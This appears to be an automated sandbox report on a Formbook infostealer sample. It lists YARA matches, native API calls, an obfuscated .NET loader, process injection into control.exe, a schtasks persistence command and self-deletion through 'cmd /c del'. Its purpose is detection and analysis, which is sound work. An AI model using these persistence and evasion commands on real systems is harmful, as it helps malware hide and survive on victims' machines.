          Source: 00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          .NET source code contains very large stringsShow sources
          Source: tgamf4XuLa.exe, Forms/mainForm.csLong String: Length: 38272
          Source: HpnpObXJP.exe.0.dr, Forms/mainForm.csLong String: Length: 38272
          Source: 0.0.tgamf4XuLa.exe.6a0000.0.unpack, Forms/mainForm.csLong String: Length: 38272
          Source: 0.2.tgamf4XuLa.exe.6a0000.0.unpack, Forms/mainForm.csLong String: Length: 38272
          Source: 6.2.tgamf4XuLa.exe.860000.1.unpack, Forms/mainForm.csLong String: Length: 38272
          Source: 6.0.tgamf4XuLa.exe.860000.0.unpack, Forms/mainForm.csLong String: Length: 38272
          Source: tgamf4XuLa.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 6.2.tgamf4XuLa.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.tgamf4XuLa.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.tgamf4XuLa.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.tgamf4XuLa.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 0_2_0288C124
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 0_2_0288E561
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 0_2_0288E570
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 6_2_00401030
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 6_2_0041B9C8
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 6_2_0041C272
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 6_2_00408C5C
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 6_2_00408C60
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 6_2_0041B4A3
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 6_2_00402D87
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 6_2_00402D90
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 6_2_00402FB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0508F900
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05080D20
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050A4120
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05151D55
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0509D5E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05141002
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0509841F
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0509B090
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050BEBB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050A6E30
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_02EC2FB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_02EC8C60
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_02EC8C5C
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_02EC2D87
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_02EC2D90
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 0508B150 appears 32 times
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 6_2_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 6_2_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 6_2_004182F0 NtClose,
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 6_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 6_2_004181BA NtCreateFile,
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 6_2_0041826A NtReadFile,
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 6_2_004182EA NtClose,
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 6_2_0041839A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050CAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050CB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050CA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050CA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050CA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_02ED82F0 NtClose,
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_02ED8270 NtReadFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_02ED83A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_02ED81C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_02ED82EA NtClose,
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_02ED826A NtReadFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_02ED839A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_02ED81BA NtCreateFile,
          Source: tgamf4XuLa.exeBinary or memory string: OriginalFilename vs tgamf4XuLa.exe
          Source: tgamf4XuLa.exe, 00000000.00000000.224546803.00000000006A2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameFormatt.exe4 vs tgamf4XuLa.exe
          Source: tgamf4XuLa.exe, 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCF_Secretaria.dll< vs tgamf4XuLa.exe
          Source: tgamf4XuLa.exe, 00000000.00000002.236927169.00000000029DB000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameEnvoySinks.dll6 vs tgamf4XuLa.exe
          Source: tgamf4XuLa.exeBinary or memory string: OriginalFilename vs tgamf4XuLa.exe
          Source: tgamf4XuLa.exe, 00000006.00000002.339403773.0000000000862000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameFormatt.exe4 vs tgamf4XuLa.exe
          Source: tgamf4XuLa.exe, 00000006.00000002.343404055.0000000001385000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs tgamf4XuLa.exe
          Source: tgamf4XuLa.exe, 00000006.00000002.343854917.000000000169F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs tgamf4XuLa.exe
          Source: tgamf4XuLa.exeBinary or memory string: OriginalFilenameFormatt.exe4 vs tgamf4XuLa.exe
          Source: tgamf4XuLa.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: HpnpObXJP.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeFile read: C:\Users\user\Desktop\tgamf4XuLa.exeJump to behavior
          Source: tgamf4XuLa.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\tgamf4XuLa.exe 'C:\Users\user\Desktop\tgamf4XuLa.exe'
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\HpnpObXJP' /XML 'C:\Users\user\AppData\Local\Temp\tmpEC5E.tmp'
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess created: C:\Users\user\Desktop\tgamf4XuLa.exe C:\Users\user\Desktop\tgamf4XuLa.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\tgamf4XuLa.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\HpnpObXJP' /XML 'C:\Users\user\AppData\Local\Temp\tmpEC5E.tmp'
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess created: C:\Users\user\Desktop\tgamf4XuLa.exe C:\Users\user\Desktop\tgamf4XuLa.exe
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\tgamf4XuLa.exe'
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeFile created: C:\Users\user\AppData\Roaming\HpnpObXJP.exeJump to behavior
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeFile created: C:\Users\user\AppData\Local\Temp\tmpEC5E.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/4@10/7
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4704:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6436:120:WilError_01
          Source: tgamf4XuLa.exe, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: HpnpObXJP.exe.0.dr, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 0.0.tgamf4XuLa.exe.6a0000.0.unpack, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 0.2.tgamf4XuLa.exe.6a0000.0.unpack, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 6.2.tgamf4XuLa.exe.860000.1.unpack, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 6.0.tgamf4XuLa.exe.860000.0.unpack, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: tgamf4XuLa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: tgamf4XuLa.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: tgamf4XuLa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: control.pdb source: tgamf4XuLa.exe, 00000006.00000002.343389175.0000000001380000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: tgamf4XuLa.exe, 00000006.00000002.343446284.00000000013F0000.00000040.00000001.sdmp, control.exe, 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: tgamf4XuLa.exe, 00000006.00000002.343446284.00000000013F0000.00000040.00000001.sdmp, control.exe
          Source: Binary string: control.pdbUGP source: tgamf4XuLa.exe, 00000006.00000002.343389175.0000000001380000.00000040.00020000.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: tgamf4XuLa.exe, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: HpnpObXJP.exe.0.dr, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.tgamf4XuLa.exe.6a0000.0.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.tgamf4XuLa.exe.6a0000.0.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.2.tgamf4XuLa.exe.860000.1.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.tgamf4XuLa.exe.860000.0.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 6_2_0041B3B5 push eax; ret
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 6_2_0041B46C push eax; ret
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 6_2_0041B402 push eax; ret
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 6_2_0041B40B push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050DD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_02EDBA79 push 67258780h; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_02EDB3B5 push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_02EC0008 push edx; retf
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_02EDC16B pushad ; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_02EDB46C push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_02EDB40B push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_02EDB402 push eax; ret
          Source: tgamf4XuLa.exeStatic PE information: 0x960770CE [Tue Oct 5 18:07:10 2049 UTC]
          Source: initial sampleStatic PE information: section name: .text entropy: 7.16093944862
          Source: initial sampleStatic PE information: section name: .text entropy: 7.16093944862
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeFile created: C:\Users\user\AppData\Roaming\HpnpObXJP.exeJump to dropped file

          Boot Survival:

          barindex
          Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\HpnpObXJP' /XML 'C:\Users\user\AppData\Local\Temp\tmpEC5E.tmp'

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\control.exeProcess created: /c del 'C:\Users\user\Desktop\tgamf4XuLa.exe'
          Source: C:\Windows\SysWOW64\control.exeProcess created: /c del 'C:\Users\user\Desktop\tgamf4XuLa.exe'
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess information set: NOOPENFILEERRORBOX
